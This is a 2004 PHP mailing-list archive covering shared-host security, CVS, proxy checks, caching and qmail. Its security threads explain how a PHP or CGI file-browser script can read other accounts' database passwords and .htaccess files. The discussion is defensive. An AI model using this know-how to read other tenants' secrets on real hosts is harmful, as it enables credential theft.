 The open_basedir prevents you from looking into anything higher
 than a particular directory tree using PHP.
 
 So, a combination of safe_mode and open_basedir should prevent
 your script from being able to walk the tree.

We know what these directives do. I think you're missing the point. How
can a PHP directive offer any protection against someone writing a CGI
that reads a file somewhere? Think about it. 

 I didn't think there was, and if there is, then we better post
 that to the security guys at php, cause that's not good.

We know that neither safe_mode nor open_basedir offer protection from
this. We also know that it's impossible to solve this problem at the PHP
level, because it is completely independent of PHP.

 I think it should be pretty safe though if implemented correctly.

If you do not offer CGI access or any interpreter besides PHP, then I
suppose it's better than nothing, but I wouldn't characterize this as
safe. I suspect that if I were a user on this host, I could give you a URL
that displays another account's password within a few minutes. But, I'm
just speculating. :-)

Chris

=
Chris Shiflett - http://shiflett.org/

PHP Security - O'Reilly
 Coming December 2004
HTTP Developer's Handbook - Sams
 http://httphandbook.org/
PHP Community Site
 http://phpcommunity.org/




[PHP] RE: Version Controlling

2004-09-26 Thread Stephen Craton
Thanks for the info, but I do have an extra question about CVS. Do I always
need access to the internet to get my files to work on them? If I were to
go out of town and not have access to the internet, how could I still work
on my files?


WiredPHP
Stephen Craton
Web Developer
IM: [EMAIL PROTECTED]
http://www.wiredphp.us






[PHP] PHP Counter?

2004-09-26 Thread Nick Wilson
Hi all, 

I have a script that at the present just outputs '$count .'<br />''
after each iteration of a foreach() loop.

I have set implicit_flush so that this works.

That's clearly monkey poo though eh? :-)

Do I have to get into unknown waters and try and make PHP talk to JS to
achieve a kind of 'hit counter' like effect or is there some easier way?

::explanation
It should print the $count var after each iteration *replacing* the last
$count

I'm stumped. A little guidance would be much appreciated...
-- 
Nick W




Re: [PHP] Best way to save preferences?

2004-09-26 Thread Marek Kilimajer
Pahlevanzadeh Mohsen wrote:
 Dear, I mean that you can't read an XML file in multiuser
 mode.

Can you elaborate? And what about other files? Are they different?


[PHP] Testing Response of A Proxy with PHP?

2004-09-26 Thread Nick Wilson
hi again all, 

I can't find any functions that might help me test the response of a
proxy server b4 attempting to use it. Do I need to use exec() with ping?

Anyone know how to do that? (if that's the case...)

mucho grassy arse..
-- 
Nick W




Re: [PHP] Testing Response of A Proxy with PHP?

2004-09-26 Thread Marek Kilimajer
Nick Wilson wrote:
 hi again all, 
 
 I can't find any functions that might help me test the response of a
 proxy server b4 attempting to use it. Do I need to use exec() with ping?
 
 Anyone know how to do that? (if that's the case...)
 
 mucho grassy arse..

What kind of response? If the server is alive, if the proxy is alive? If 
an url exists?



Re: [PHP] Testing Response of A Proxy with PHP?

2004-09-26 Thread Nick Wilson

* and then Marek Kilimajer declared
 I can't find any functions that might help me test the response of a
 proxy server b4 attempting to use it. Do I need to use exec() with ping?
 
 Anyone know how to do that? (if that's the case...)
 
 What kind of response? If the server is alive, if the proxy is alive? If 
 an url exists?

hehe, good point! Just if the server is alive i guess. I want to use the
proxy and want to test if it's responsive b4 i attempt to use it...


-- 
Nick W




Re: [PHP] php security on shared hosts

2004-09-26 Thread Jason Wong
On Monday 27 September 2004 02:26, Chris Shiflett wrote:

 If you do not offer CGI access or any interpreter besides PHP, then I
 suppose it's better than nothing, but I wouldn't characterize this as
 safe. I suspect that if I were a user on this host, I could give you a URL
 that displays another account's password within a few minutes. But, I'm
 just speculating. :-)

Stop it! You're scaring away his customers ;-)

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
Whatever women do they must do twice as well as men to be thought half
as good.  Luckily this is not difficult.
-- Charlotte Whitton
*/




Re: [PHP] RE: Version Controlling

2004-09-26 Thread Jason Wong
On Monday 27 September 2004 02:28, Stephen Craton wrote:
 Thanks for the info, but I do have an extra question about CVS. Do I always
 need access to the internet to get my files to work on them?

Yes and no. And depends on where your CVS server is located. Obviously if the 
computer you're working on also hosts the CVS server then you don't need 
internet access.

When you work with CVS you usually:

- check out a set of files (for which you need access to the CVS server)
- edit them (no access needed)
- when you're sure you've fixed more bugs than you've introduced, you commit 
those files, ie send the changes to the CVS server (for which you need access 
to the CVS server)

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
You would if you could but you can't so you won't.
*/




Re: [PHP] 9 line function logic problem

2004-09-26 Thread bagheera
Hi!

Try to globalize the $include_path variable:

function is_cache($get_file) {
    global $include_path;
    ...
}

bagheera

Mag wrote:
 Hi,
 I am going crazy with this function please have a look
 at it and tell me what i am doing wrong.
 
 This is my setup:
 I have a file called one.html.cache in the directory
 /cache/
 in one.html.cache I have a time()+ 3600 number (eg:
 1096224755)
 
 I need to know if the number in that file is still
 bigger than the present time() or not
 
 the problem is, it is always returning zero...
 here's the function:
 
 echo "<b>".is_cache("one.html");
 
 function is_cache($get_file)
 {
     $th_file = $include_path.$get_file . '.cache';
     // read the stored timestamp from the cache file
     $fp = fopen($th_file, 'a+');
     fseek($fp, 0);
     $rd = fread($fp, filesize($th_file));
     fclose($fp);
 
     if (time() - $rd > 5)
         return 0;
     else
         return 1;
 }
 
 What am i doing wrong? or is there a better way of
 doing this?
 
 Thanks,
 Mag
=
--
- The faulty interface lies between the chair and the keyboard.
- Creativity is great, but plagiarism is faster!
- Smile, everyone loves a moron. :-)
		


RE: [PHP] php security on shared hosts

2004-09-26 Thread Pablo Gosse
[snip]
I just published a free article on my Web site about shared hosting:

http://shiflett.org/articles/security-corner-mar2004

In short, what you've found is typical for most shared hosts, and
safe_mode (a directive created to help mitigate this problem a bit) does
little to help. However, there are some things you can do as a
developer,
and I give some specific examples.
[/snip]

Hi, Chris.  Thanks for that link.  It was incredibly informative.

I just took your code for the file browser and it was able to read the
information in all users' webroots and all other directories and files
readable by nobody:nobody, including database passwords, .htaccess files
(which contained paths to password and group files), etc.

There was no /etc/passwd file, but this is irrelevant as I was simply
able to browse the /virtual directory to see a list of all users home
directories, and from there their webroots, etc.

I guess it is an inevitable fact that if you are on a shared host, any
script executed from the browser is capable of reading any other script
on the server which is set to be readable by the web server.

I usually store all my files with sensitive information and class files
outside the webroot, but under this setup, anyone could simply read the
contents of the files in the webroot and use the information in those
files to then read the files which are stored outside of the webroot.

Unfortunately I don't have access to my server config file (a 'find'
command for httpd.conf returned no results), so is this something a host
would usually change for individual users?

Also, safe_mode is not enabled on this host so while I assume that I
could enable it using .htaccess for my site, that still would not
prevent anyone else from reading my scripts since their scripts would
not be running in safe mode, right?

Thoughts?

Cheers and TIA,

Pablo.




Re: [PHP] Best way to save preferences?

2004-09-26 Thread Robby Russell
On Sun, 2004-09-26 at 10:00, Victor Spång Arthursson wrote:
 Which is the best way to save preferences (for a site) to make them 
 easily accessible for changes?
 
 What I want is a way to save arrays and read them in again without 
 having to use a database
 
 Thankful for suggests,
 
 sincerely
 
 Victor

http://www.sqlite.org/ perhaps?


-- 
/***
* Robby Russell | Owner.Developer.Geek
* PLANET ARGON  | www.planetargon.com
* Portland, OR  | [EMAIL PROTECTED]
* 503.351.4730  | blog.planetargon.com
* PHP/PostgreSQL Hosting & Development
/





Re: [PHP] Testing Response of A Proxy with PHP?

2004-09-26 Thread Marek Kilimajer
Nick Wilson wrote:
 * and then Marek Kilimajer declared
   I can't find any functions that might help me test the response of a
   proxy server b4 attempting to use it. Do I need to use exec() with ping?
   Anyone know how to do that? (if that's the case...)
 
  What kind of response? If the server is alive, if the proxy is alive? If 
  an url exists?
 
 hehe, good point! Just if the server is alive i guess. I want to use the
 proxy and want to test if it's responsive b4 i attempt to use it...

OPTIONS * HTTP/1.0

More at http://www.freesoft.org/CIE/RFC/2068/63.htm


Re: [PHP] PHP Counter?

2004-09-26 Thread Marek Kilimajer
Nick Wilson wrote:
 Hi all, 
 
 I have a script that at the present just outputs '$count .'<br />''
 after each iteration of a foreach() loop.
 
 I have set implicit_flush so that this works.
 
 That's clearly monkey poo though eh? :-)
 
 Do I have to get into unknown waters and try and make PHP talk to JS to
 achieve a kind of 'hit counter' like effect or is there some easier way?
 
 ::explanation
 It should print the $count var after each iteration *replacing* the last
 $count
 
 I'm stumped. A little guidance would be much appreciated...

Either JS or Refresh header with some timeout. With JS you can use an 
input textbox styled to not have any borders. Refresh header will 
refresh the whole page.



Re: [PHP] Testing Response of A Proxy with PHP?

2004-09-26 Thread Nick Wilson

* and then Marek Kilimajer declared
 OPTIONS * HTTP/1.0
 
 More at http://www.freesoft.org/CIE/RFC/2068/63.htm


oookay... i think i understand the page, but how would i implement that
and what would be the difference in that and just pinging the server to
see if it's responding?

Thanks for the help..

-- 
Nick W




Re: [PHP] Testing Response of A Proxy with PHP?

2004-09-26 Thread Marek Kilimajer
Nick Wilson wrote:
 * and then Marek Kilimajer declared
  OPTIONS * HTTP/1.0
  More at http://www.freesoft.org/CIE/RFC/2068/63.htm
 
 oookay... i think i understand the page, but how would i implement that

$fp = fsockopen ("proxy.server.net", 8080, $errno, $errstr, 30);
if (!$fp) {
    // Could not connect to the proxy port at all.
    echo "$errstr ($errno)<br>\n";
} else {
    // Max-Forwards: 0 makes the proxy itself answer the OPTIONS request.
    fputs ($fp, "OPTIONS * HTTP/1.0\r\nMax-Forwards: 0\r\n\r\n");
    while (!feof($fp)) {
        echo fgets ($fp,128);
    }
    fclose ($fp);
}

You should get something like:

HTTP/1.0 200 Ok
Date: Sun, 26 Sep 2004 20:48:46 GMT
Via: HTTP/1.1 proxy.server.net (Traffic-Server/4.0.18 [c s f ])
Allow: CONNECT, DELETE, GET, HEAD, OPTIONS, POST, PURGE, PUT, PUSH, TRACE
Content-Length: 0

 and what would be the difference in that and just pinging the server to
 see if it's responding?

Even if the server is up that does not mean proxy is working.


RE: [PHP] php security on shared hosts

2004-09-26 Thread Chris Shiflett
--- Pablo Gosse [EMAIL PROTECTED] wrote:
 http://shiflett.org/articles/security-corner-mar2004

[snip]

 Hi, Chris. Thanks for that link. It was incredibly informative.

I'm glad you thought so. :-)

 I just took your code for the file browser and it was able to
 read the information in all users' webroots and all other
 directories and files readable by nobody:nobody, including
 database passwords, .htaccess files (which contained paths to
 password and group files), etc.

Right, and this isn't unusual. What I should probably do is write one of
these simple filesystem browsers in various shells, Perl, and any other
type of interpreter commonly available on shared hosts. This might better
illustrate that things like safe_mode are no solution.

 I guess it is an inevitable fact that if you are on a shared
 host, any script executed from the browser is capable of
 reading any other script on the server which is set to be
 readable by the web server.

Yep, it sounds like you understand the problem quite well. What some
people miss is the fact that the contents of a file have nothing to do
with filesystem privileges and such. The fact that one file has PHP code
in it is irrelevant.

 I usually store all my files with sensitive information and
 class files outside the webroot, but under this setup, anyone
 could simply read the contents of the files in the webroot and
 use the information in those files to then read the files which
 are stored outside of the webroot.

This is still a very good practice, and I hope you continue to use it.

 Unfortunately I don't have access to my server config file (a
 'find' command for httpd.conf returned no results), so is this
 something a host would usually change for individual users?

It should be, and you can always point them to my article if they don't
understand why you want this. Is your host running Apache?

 Also, safe_mode is not enabled on this host so while I assume
 that I could enable it using .htaccess for my site, that still
 would not prevent anyone else from reading my scripts since their
 scripts would not be running in safe mode, right?

That's exactly right. Also, the bad guys might be Perl programmers. :-)

Chris

=
Chris Shiflett - http://shiflett.org/

PHP Security - O'Reilly
 Coming December 2004
HTTP Developer's Handbook - Sams
 http://httphandbook.org/
PHP Community Site
 http://phpcommunity.org/
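
The exposure discussed in this thread is decided by filesystem mode bits, not by the interpreter. The PHP below is an added example, not code from the thread or from Chris's article: it audits your own account's tree for files the shared web-server account can read and flags those that look like they hold credentials. The function names, the credential pattern, and the use of nobody as the default account are assumptions; ACLs, jails and supplementary groups are not modelled.

```php
<?php
// Added example (not from the thread). Run it against YOUR OWN directory.
// Assumption: every customer's script runs as one shared account
// ("nobody:nobody" in the thread), whose uid/gid you pass in.

/** Return the rwx triad (0-7) of a stat() result that applies to uid/gids. */
function triadFor(array $st, int $uid, array $gids): int
{
    if ($st['uid'] === $uid) {
        return ($st['mode'] >> 6) & 7;          // owner bits
    }
    if (in_array($st['gid'], $gids, true)) {
        return ($st['mode'] >> 3) & 7;          // group bits
    }
    return $st['mode'] & 7;                     // other bits
}

/**
 * Can the identity read $path? It needs search (x) on every ancestor
 * directory and read (r) on the file itself. POSIX mode bits only.
 */
function readableBy(string $path, int $uid, array $gids): bool
{
    $real = realpath($path);
    if ($real === false) {
        return false;
    }
    // Build the chain "/", "/home", ..., $real.
    $chain = [$real];
    while (($parent = dirname($chain[0])) !== $chain[0]) {
        array_unshift($chain, $parent);
    }
    $last = count($chain) - 1;
    foreach ($chain as $i => $p) {
        $st = @stat($p);
        if ($st === false) {
            return false;
        }
        $need = ($i === $last) ? 4 : 1;         // r on the target, x on ancestors
        if ((triadFor($st, $uid, $gids) & $need) === 0) {
            return false;
        }
    }
    return true;
}

/** List files under $root that the identity can read, flagging likely secrets. */
function auditTree(string $root, int $uid, array $gids): array
{
    // Hypothetical heuristic for credential-looking assignments.
    $secret = '/(passw(or)?d|secret|api[_-]?key)["\']?\s*(=>|=|:)/i';
    $walker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::LEAVES_ONLY,
        RecursiveIteratorIterator::CATCH_GET_CHILD   // skip unreadable directories
    );
    $findings = [];
    foreach ($walker as $file) {
        $path = $file->getPathname();
        if (!$file->isFile() || !readableBy($path, $uid, $gids)) {
            continue;
        }
        // Inspect only the first 64 KiB; enough for config-style files.
        $head = (string) @file_get_contents($path, false, null, 0, 65536);
        $findings[] = [
            'path'      => $path,
            'mode'      => sprintf('%04o', $file->getPerms() & 07777),
            'sensitive' => preg_match($secret, $head) === 1
                || preg_match('/^\.ht(access|passwd)$/', $file->getFilename()) === 1,
        ];
    }
    return $findings;
}

// CLI use: php audit.php /path/to/your/account [web-server-user]
if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $user = $argv[2] ?? 'nobody';               // account named in the thread
    $pw = function_exists('posix_getpwnam') ? posix_getpwnam($user) : false;
    if ($pw === false) {
        fwrite(STDERR, "cannot resolve user $user (posix extension needed)\n");
        exit(2);
    }
    // Only the account's primary group is considered here.
    foreach (auditTree($argv[1], $pw['uid'], [$pw['gid']]) as $f) {
        printf("%s %-9s %s\n", $f['mode'], $f['sensitive'] ? 'SENSITIVE' : '-', $f['path']);
    }
}
```

Lines marked SENSITIVE are files whose contents any script running as that shared account could read, whatever language it is written in.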




RE: [PHP] php security on shared hosts

2004-09-26 Thread Pablo Gosse
[snip]
In short, what you've found is typical for most shared hosts
[/snip]

I've just been reviewing the way sites are housed on my host, and what
directories are readable by the web server and I'm curious to get
opinions on this.

When I use Chris' file browser script, there is a folder called
'virtual' in the site root, and it is readable by the web browser.

Inside /virtual there are three folders for every site, which I list
below.

--
site357
pablogosse.com
admin357
--

Browsing these for my site I see the following:

site357:

4096   ./
20480  ../
4096   fst/
4096   info/

pablogosse.com and admin357:

4096   ./
4096   ../
4096   bin/
4096   boot/
4096   dev/
4096   etc/
4096   home/
4096   initrd/
4096   lib/
4096   mnt/
4096   opt/
4096   proc/
4096   root/
4096   sbin/
4096   tmp/
4096   usr/
4096   var/
498    subdomain
4096   mysql/
7392   dump.xml

Also, if I browse the fst/ folder inside site357, I get the same results
as pablogosse.com and admin357.

I'm then able to browse freely through all the above folders except
/home and /root.

I'm no security expert so I have to ask, is this indeed normal?

Cheers and TIA.

Pablo




Re: [PHP] Testing Response of A Proxy with PHP?

2004-09-26 Thread Nick Wilson

* and then Marek Kilimajer declared
  oookay... i think i understand the page, but how would i implement that
 
 $fp = fsockopen ("proxy.server.net", 8080, $errno, $errstr, 30);
 if (!$fp) {
     echo "$errstr ($errno)<br>\n";
 } else {
     fputs ($fp, "OPTIONS * HTTP/1.0\r\nMax-Forwards: 0\r\n\r\n");
     while (!feof($fp)) {
         echo fgets ($fp,128);
     }
     fclose ($fp);
 }

Okay, thanks marek, i can take it from there ;-)
I'm tired, it's past my bedtime, i'll check the manual in the morning and
work on your code. Thanks very, very much!

 Even if the server is up that does not mean proxy is working.

Yep, i get it. Thanks..

-- 
Nick W




Re: [PHP] php security on shared hosts

2004-09-26 Thread Tim Traver
Ahhh...ok, now you're talking about something else.

I thought we were just talking about the security model of PHP only. Yes, 
if a host has decided to offer another means for CGI that isn't safe, then 
that is another issue altogether...;)

I was just talking about PHP's security model. Safe mode + open_basedir + 
included directories + exec directories should be enough to prevent a PHP 
script from viewing the tree, and anyone else's data.

If you have a way, using PHP (not a perl or sh or tcl script), to get 
around those directives, then please let me know.

Personally, I never wanted to offer any CGI scripting to our customers, but 
in this day and age, a shared host has to, because the customers expect it, 
even though they have no idea how to use it. So I've created a jailed 
environment for perl to run as the user, and away from everyone else's 
directories. I am still wary of how safe that is, but it's as close as I can 
get it...

Seriously, let me know if you've got any issues with PHP's security model.

Tim.

SimpleNet's Back !
http://www.simplenet.com


[PHP] mail function and qmail

2004-09-26 Thread php mysql
mail function in php requires to use 'sendmail'. But I have only
'qmail' on the box. How I can send email in PHP?

Thanks




RE: [PHP] php security on shared hosts

2004-09-26 Thread Tim Traver
Pablo,

I tested Chris's script on our systems, and couldn't browse anywhere other 
than my own directories, so it is possible to set php up on shared hosts 
that is a lot more secure than what your host has done.

May I ask what host this is? Is it a major one?

Tim.

SimpleNet's Back !
http://www.simplenet.com


[PHP] Re: mail function and qmail

2004-09-26 Thread M. Sokolewicz
Php Mysql wrote:
 mail function in php requires to use 'sendmail'. But I have only
 'qmail' on the box. How I can send email in PHP?
 Thanks

just pretend it doesn't say sendmail but qmail. It works on both :)


Re: [PHP] Conceptual ?: using 'multi-purpose' form for validation

2004-09-26 Thread Whil Hentzen
On Sunday 26 September 2004 04:35, Marek Kilimajer wrote:
 Whil Hentzen wrote:
  I can get a single form to call itself again if there's nothing fancy
  going on. This code will prompt the user for their mail if it doesn't
  already exist, and if the email does exist, provides some data out of
  database.
 
  <?php

 $email = (isset($_POST['email']) ? $_POST['email'] : '');

 if ( !validate_email($email) ): ?>

 <!-- No email, so prompt the user for one.-->

Thanks for the quick response. 

At this point, I feel a little like Einstein's wife, who, when asked if she 
understood the papers that her husband wrote, said, "I understand the words, 
but not the sentences."

I gather that the 'validate_email' is a separate function that I will 
write, passing the email var, and getting either a T or F response. 

Now... where does this go? In the PHP page? A separate function in a separate 
.php file? Or?

Thanks,

-- 
Whil

Moving to Linux: Freedom, Choice, Security, Opportunity
http://www.hentzenwerke.com




[PHP] Re: mail function and qmail

2004-09-26 Thread Catalin Trifu
Php Mysql wrote:
 mail function in php requires to use 'sendmail'. But I have only
 'qmail' on the box. How I can send email in PHP?
 Thanks

Hi,
   After you installed qmail, there is a qmail compatible sendmail 
created for you in /var/lib/qmail/bin (I think that's where it should be).
   As the qmail docs say, you should copy or symlink this sendmail to the
/bin/sendmail or /usr/bin/sendmail on your system.
   Make sure you first back up your original sendmail.
   This should make PHP's mail stuff work as expected with qmail

hope this helps,
Catalin